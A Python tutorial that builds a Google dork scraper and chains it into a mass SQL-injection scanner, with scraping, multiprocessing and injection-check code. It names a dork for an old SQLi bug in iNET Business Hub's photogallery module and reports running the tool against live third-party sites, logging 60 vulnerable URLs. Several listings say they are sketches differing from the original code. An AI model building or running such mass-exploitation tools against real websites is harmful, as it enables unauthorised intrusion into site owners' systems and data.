[Python] Making Your Own Google Scraper & Mass Exploiter

In this step-by-step tutorial, I'll show you how to make your own Google scraper (dork scanner) and mass vulnerability scanner / exploiter in Python.

Why Python? Because why not?

  • Simplicity
  • Efficiency
  • Extensibility
  • Cross-Platform Portability
  • Best Community


For this tutorial, I'll be using Python 3.4.3, some built-in libraries (sys, multiprocessing, functools, re) and the following modules.


Requests is an Apache2 Licensed HTTP library, written in Python, for human beings.


Beautiful Soup sits atop an HTML or XML parser, providing Pythonic idioms for iterating, searching, and modifying the parse tree.

To install these modules, I'll use pip. As per the documentation, pip is the preferred installer program, and starting with Python 3.4, it is included by default with the Python binary installers. To use pip, open your terminal and simply type:
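
    pip install requests
    pip install beautifulsoup4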


Now we’re ready. Let’s get started.


I'll try to make this as simple (readable) as possible. Read the comments given in the code. With each new snippet, I'll remove the previous comments to make room for the new ones, so make sure you don't miss any.

First of all, let's see how Google search works.
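
Every results page comes from a URL of this general form:

    https://www.google.com/search?q=<search string>&start=<offset>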

This URL takes two parameters, q and start.

q = our search string

start = page number * 10 (counting pages from zero, so the first page is start=0, the second is start=10, and so on)

So, if I want to do a search for the string makman, the URLs would be:
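
    https://www.google.com/search?q=makman&start=0
    https://www.google.com/search?q=makman&start=10
    https://www.google.com/search?q=makman&start=20

and so on, one URL per page of results.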

Let’s do a quick test and see if we can grab the first page.
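
Here's a minimal sketch of that test (the User-Agent header is an assumption on my part, to coax Google into returning the normal HTML page):

    import requests

    # Pretend to be a regular browser; Google may serve a stripped-down
    # page (or none at all) to unknown clients
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
    r = requests.get('https://www.google.com/search',
                     params={'q': 'makman', 'start': 0},
                     headers=headers)
    print(r.text)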

It'll display the HTML source.


Now, we'll use beautifulsoup4 to pull the required data from the source. Our required URLs are inside <h3> tags with class 'r'.


There'll be 10 <h3 class="r"> tags on each page, and each required URL will be inside one of them as <a href="here">. So, we'll use beautifulsoup4 to grab the contents of all these h3 tags and then some regex matching to get our final URLs, as in the sketch below.
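
A sketch of that extraction step, assuming the page source from the previous request is still in r.text (Google wraps each real URL in a /url?q=... redirect, which the regex below strips off):

    import re
    from bs4 import BeautifulSoup

    soup = BeautifulSoup(r.text, 'html.parser')
    for h3 in soup.find_all('h3', class_='r'):
        a = h3.find('a')
        if a is None:
            continue
        # result links look like /url?q=http://example.com/page&sa=U&...
        match = re.search(r'q=(http[^&]+)', a.get('href', ''))
        if match:
            print(match.group(1))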

And we’ll get the URLs of the first page.


Now we just have to make this whole procedure generic. The user will provide the search string and the number of pages to scan. I'll turn the whole process into a function and call it dynamically when required. To create the command line interface, I'll use an awesome module called docopt, which is not included in Python's core, but you'll love it. I'll use pip (again) to install docopt:
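
    pip install docopt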


After adding the command line interface, user interaction, a little dynamic functionality, and some time-logging to check the execution time of the script, this is what it looks like.
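
In outline, a minimal sketch of such a script (names like scraper.py and google_scan are my own placeholders, not the author's exact code; the docstring is what drives docopt's argument parsing):

    """Makman Google Scraper.

    Usage:
      scraper.py <search> <pages>
      scraper.py (-h | --help)

    Options:
      -h --help     Show this screen.
    """
    import re
    import time

    import requests
    from bs4 import BeautifulSoup
    from docopt import docopt


    def google_scan(search, page):
        # fetch one page of Google results and return the extracted URLs
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
        params = {'q': search, 'start': page * 10}
        r = requests.get('https://www.google.com/search',
                         params=params, headers=headers)
        soup = BeautifulSoup(r.text, 'html.parser')
        urls = []
        for h3 in soup.find_all('h3', class_='r'):
            a = h3.find('a')
            if a:
                match = re.search(r'q=(http[^&]+)', a.get('href', ''))
                if match:
                    urls.append(match.group(1))
        return urls


    if __name__ == '__main__':
        args = docopt(__doc__)
        start_time = time.time()
        for page in range(int(args['<pages>'])):
            for url in google_scan(args['<search>'], page):
                print(url)
        print('Total Execution Time:', time.time() - start_time)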

Now let’s give it a try.


Sweet. 😀 Let's run it for the string 'microsoft', scan the first 20 pages, and check the execution time.


So, it scraped 200 URLs in about 32 seconds. Currently, it's running as a single process. Let's add some multiprocessing and see if we can reduce the execution time. After adding multiprocessing support, this is what my script looks like.
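
In outline (again a sketch rather than the exact listing), the per-page work goes to a process pool; this assumes the docopt usage line gains a third argument, <processes>, and reuses google_scan from above. functools.partial pins the search string so pool.map only has to vary the page number:

    from functools import partial
    from multiprocessing import Pool

    # google_scan and the docopt docstring stay as before,
    # with <processes> added to the usage line

    if __name__ == '__main__':
        args = docopt(__doc__)
        start_time = time.time()
        pages = range(int(args['<pages>']))
        with Pool(processes=int(args['<processes>'])) as pool:
            # each worker process fetches and parses one results page
            for urls in pool.map(partial(google_scan, args['<search>']), pages):
                for url in urls:
                    print(url)
        print('Total Execution Time:', time.time() - start_time)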

Now let’s run the same string ‘microsoft’ for 20 pages but this time with 8 parallel processes. 😀



Perfect. The execution time went down to 6 seconds, almost five times faster than the previous attempt.


It won't be a good idea to use more than 8 parallel processes; Google may block your IP or display the captcha verification page instead of the search results. I would recommend keeping it under 8.

So, our Google URL scraper is up and running. 😀 Now I'll show you how to make a mass vulnerability scanner & exploitation tool using this Google scraper. We can save this file and use it as a separate module in other projects. I'll save the following code as makman.py.

I have renamed the main function to dork_scanner. Now I can import this file in any other Python code and call dork_scanner to get URLs. dork_scanner takes 3 parameters: the search string, the number of pages to scan, and the number of parallel processes. At the end, it returns a list of URLs. Just make sure makman.py is in the same directory as the other file. Let's try it out.
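
For example, a quick test along these lines (whether the arguments are passed as strings or integers is an assumption on my part):

    from makman import dork_scanner

    # search string, pages to scan, parallel processes
    for url in dork_scanner('microsoft', 2, 2):
        print(url)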


Mass Scanning / Exploitation

I'll demonstrate mass scanning / exploitation using an SQL injection vulnerability that affects some websites developed by iNET Business Hub (web application developers). Here's a demo of an SQLi vulnerability in their photogallery module.


Even though this vulnerability is very old, there are still hundreds of websites vulnerable to this bug. We can use the following Google dork to find the vulnerable websites.

intext:Developed by : iNET inurl:photogallery.php

I’ve made a separate function to perform the injection. Make sure makman.py is in the same directory.
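
As a sketch of the general shape of that function (the real payload differs; this minimal error-based check just appends a single quote and looks for a database error message in the response):

    import requests

    def inject(url):
        # append a single quote and look for a MySQL error in the response;
        # a simple error-based check, not the original payload
        try:
            r = requests.get(url + "'", timeout=10)
            if 'You have an error in your SQL syntax' in r.text:
                return url  # looks injectable
        except requests.RequestException:
            pass  # dead host, timeout, SSL trouble, etc.
        return None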

I'll call my dork_scanner function in the main function and scan the first 15 pages with 4 parallel processes. For the exploitation part, I'll use 8 parallel processes, because we have to inject around 150 URLs and it would take a hell of a lot of time with a single process. So, after adding the main function, multiprocessing for the exploitation part, and some file logging to save the results, this is what my script looks like.
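
Pieced together, a sketch of that main script (the result file name and print format are my own choices, not necessarily the original's):

    import time
    from multiprocessing import Pool

    from makman import dork_scanner
    # the inject() function from the previous sketch lives in this same file

    if __name__ == '__main__':
        start_time = time.time()
        # gather candidate URLs: first 15 pages, 4 parallel processes
        dork = 'intext:Developed by : iNET inurl:photogallery.php'
        urls = dork_scanner(dork, 15, 4)
        # test every URL with 8 parallel processes
        with Pool(processes=8) as pool:
            results = pool.map(inject, urls)
        vulnerable = [url for url in results if url]
        with open('makman_results.txt', 'w') as f:
            f.write('\n'.join(vulnerable))
        print('Total URLs Scanned    :', len(urls))
        print('Vulnerable URLs Found :', len(vulnerable))
        print('Script Execution Time :', time.time() - start_time)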


Scan Result:

Total URLs Scanned : 140
Vulnerable URLs Found : 60
Script Execution Time : 64.60677099227905

So technically speaking, in 64 seconds we scanned 15 pages of Google, grabbed 140 URLs, visited all 140 individually and performed the SQL injection, and finally saved the results of 60 vulnerable URLs. So f***in cool!!

You can see the result file generated at the end of the script here.

GitHub Repository:

Final Notes:

This script is not perfect, and we can still add many features to it. If you have any suggestions, feel free to contact me; details are in the footer. And thanks for reading.


I hereby take no responsibility for any loss or damage caused by this tutorial. This article has been shared for educational purposes only, and automatic crawling is against Google's terms of service.